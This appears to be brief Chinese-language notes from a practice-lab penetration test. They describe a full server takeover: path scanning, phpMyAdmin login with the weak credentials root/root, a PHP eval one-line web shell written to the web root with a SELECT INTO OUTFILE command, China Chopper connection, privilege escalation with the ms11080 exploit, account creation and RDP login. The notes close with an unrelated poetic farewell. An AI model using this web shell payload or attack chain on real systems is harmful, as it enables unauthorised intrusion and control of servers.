拿到靶場 直接進行掃描 爆破路徑
發現 phpinfo, phpmyadmin 更具phpinfo 擷取跟路徑 也可以通過
輸入錯路徑爆出絕對路徑
phpmyamin 弱密碼登入 root,root
sql 直接寫一句話木馬
select '<?php eval($_POST[1])?>' into outfile 'C:\\phpStudy\\WWW\\1.php'
菜刀連接配接 上傳 ms11080.exe 提權 添加 90sec 用
mstsc 直接遠端登入
從此山高路遠,縱馬揚鞭。願往後旅途,三冬暖,春不寒,天黑有燈,下雨有傘。此生盡興,不負勇往。